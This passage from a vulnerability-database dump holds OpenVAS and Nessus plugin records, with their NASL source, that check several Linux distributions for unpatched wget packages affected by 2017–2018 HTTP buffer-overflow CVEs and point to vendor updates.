isrpmvuln(pkg:\"wget\", rpm:\"wget~1.14~15.el7_4.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wget-debuginfo\", rpm:\"wget-debuginfo~1.14~15.el7_4.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:37:36", "references": ["2018-29ebba0906", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GCIJYTMYEID4ASDDPBPLFIC5MUFFLRO7"], "pluginID": "1361412562310874437", "description": "Check the version of wget", "edition": 4, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-05-14T00:00:00", "title": "Fedora Update for wget FEDORA-2018-29ebba0906", "type": "openvas", "enchantments": {"score": {"modified": "2018-09-01T23:37:36", "vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090", "CVE-2018-0494"], "modified": "2018-06-15T00:00:00", "id": "OPENVAS:1361412562310874437", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874437", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_29ebba0906_wget_fc27.nasl 10224 2018-06-15 14:29:06Z cfischer $\n#\n# Fedora Update for wget FEDORA-2018-29ebba0906\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874437\");\n script_version(\"$Revision: 10224 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-06-15 16:29:06 +0200 (Fri, 15 Jun 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-14 05:47:04 +0200 (Mon, 14 May 2018)\");\n script_cve_id(\"CVE-2018-0494\", \"CVE-2017-13089\", \"CVE-2017-13090\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for wget FEDORA-2018-29ebba0906\");\n script_tag(name:\"summary\", value:\"Check the version of wget\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present \non the target host.\");\n script_tag(name:\"insight\", value:\"GNU Wget is a file retrieval utility which \ncan use either the HTTP or FTP protocols. Wget features include the ability to \nwork in the background while you are logged out, recursive retrieval of directories, \nfile name wildcard matching, remote file timestamp storage and comparison, use of \nRest with FTP servers and Range with HTTP servers to retrieve files over slow or \nunstable connections, support for Proxy servers, and configurability.\n\");\n script_tag(name:\"affected\", value:\"wget on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-29ebba0906\");\n script_xref(name:\"URL\" , value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GCIJYTMYEID4ASDDPBPLFIC5MUFFLRO7\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.19.5~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:37:13", "references": ["https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7W7R2M6URBCN4M3QPMWBHBB7KUM2DCQ2", "2018-f29459149a"], "pluginID": "1361412562310874438", "description": "Check the version of wget", "edition": 4, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-05-14T00:00:00", "title": "Fedora Update for wget FEDORA-2018-f29459149a", "type": "openvas", "enchantments": {"score": {"modified": "2018-09-01T23:37:13", "vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090", "CVE-2018-0494"], "modified": "2018-06-15T00:00:00", "id": "OPENVAS:1361412562310874438", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874438", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_f29459149a_wget_fc26.nasl 10224 2018-06-15 14:29:06Z cfischer $\n#\n# Fedora Update for wget FEDORA-2018-f29459149a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874438\");\n script_version(\"$Revision: 10224 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-06-15 16:29:06 +0200 (Fri, 15 Jun 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-14 05:47:14 +0200 (Mon, 14 May 2018)\");\n script_cve_id(\"CVE-2018-0494\", \"CVE-2017-13089\", \"CVE-2017-13090\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for wget FEDORA-2018-f29459149a\");\n script_tag(name:\"summary\", value:\"Check the version of wget\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present \non the target host.\");\n script_tag(name:\"insight\", value:\"GNU Wget is a file retrieval utility which \ncan use either the HTTP or FTP protocols. Wget features include the ability to \nwork in the background while you are logged out, recursive retrieval of\ndirectories, file name wildcard matching, remote file timestamp storage and \ncomparison, use of Rest with FTP servers and Range with HTTP servers to \nretrieve files over slow or unstable connections, support for Proxy servers, \nand configurability.\n\");\n script_tag(name:\"affected\", value:\"wget on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-f29459149a\");\n script_xref(name:\"URL\" , value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7W7R2M6URBCN4M3QPMWBHBB7KUM2DCQ2\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.19.5~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:45:26", "references": ["http://www.nessus.org/u?fc9acf67"], "pluginID": "104216", "description": "New wget packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, 14.2, and -current to fix security issues.", "edition": 6, "reporter": "Tenable", "published": "2017-10-30T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : wget (SSA:2017-300-02)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-01-26T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:wget", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2017-300-02.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104216", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-300-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104216);\n script_version(\"$Revision: 3.3 $\");\n script_cvs_date(\"$Date: 2018/01/26 17:57:43 $\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_xref(name:\"SSA\", value:\"2017-300-02\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : wget (SSA:2017-300-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New wget packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.534644\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fc9acf67\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"wget\", pkgver:\"1.19.2\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:02:17", "references": ["https://packages.debian.org/source/wheezy/wget", "https://lists.debian.org/debian-lts-announce/2017/10/msg00028.html"], "pluginID": "104221", "description": "CVE-2017-13089 Fix stack overflow in HTTP protocol handling.\n\nCVE-2017-13090 Fix heap overflow in HTTP protocol handling.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.13.4-3+deb7u5.\n\nWe recommend that you upgrade your wget packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 8, "reporter": "Tenable", "published": "2017-10-30T00:00:00", "title": "Debian DLA-1149-1 : wget security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-07-09T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:wget"], "id": "DEBIAN_DLA-1149.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104221", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1149-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104221);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/07/09 12:26:58\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n\n script_name(english:\"Debian DLA-1149-1 : wget security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2017-13089 Fix stack overflow in HTTP protocol handling.\n\nCVE-2017-13090 Fix heap overflow in HTTP protocol handling.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.13.4-3+deb7u5.\n\nWe recommend that you upgrade your wget packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/10/msg00028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/wget\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected wget package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"wget\", reference:\"1.13.4-3+deb7u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-02T15:20:26", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=1064716", "https://www.suse.com/security/cve/CVE-2017-13090/", "http://www.nessus.org/u?5c1f555d", "https://www.suse.com/security/cve/CVE-2017-13089/", "https://bugzilla.suse.com/show_bug.cgi?id=1064715"], "pluginID": "104650", "description": "This update for wget fixes the following security issues :\n\n - CVE-2017-13089,CVE-2017-13090: Missing checks for negative remaining_chunk_size in skip_short_body and fd_read_body could cause stack-based buffer overflows, which could have been exploited by malicious servers.\n (bsc#1064715,bsc#1064716)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 10, "reporter": "Tenable", "published": "2017-11-17T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : wget (SUSE-SU-2017:2871-2)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-11-30T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:wget-debugsource", "p-cpe:/a:novell:suse_linux:wget-debuginfo", "p-cpe:/a:novell:suse_linux:wget"], "id": "SUSE_SU-2017-2871-2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104650", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2871-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104650);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2018/11/30 10:54:51\");\n\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : wget (SUSE-SU-2017:2871-2)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following security issues :\n\n - CVE-2017-13089,CVE-2017-13090: Missing checks for\n negative remaining_chunk_size in skip_short_body and\n fd_read_body could cause stack-based buffer overflows,\n which could have been exploited by malicious servers.\n (bsc#1064715,bsc#1064716)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13089/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13090/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172871-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5c1f555d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 6:zypper in -t patch\nSUSE-OpenStack-Cloud-6-2017-1794=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1794=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-1794=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1794=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1794=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1794=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-1794=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-1794=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(0|1|2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1/2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"wget-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"wget-debuginfo-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"wget-debugsource-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"wget-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"wget-debuginfo-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"wget-debugsource-1.14-21.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"wget-1.14-21.3.1\")) flag++;\nif 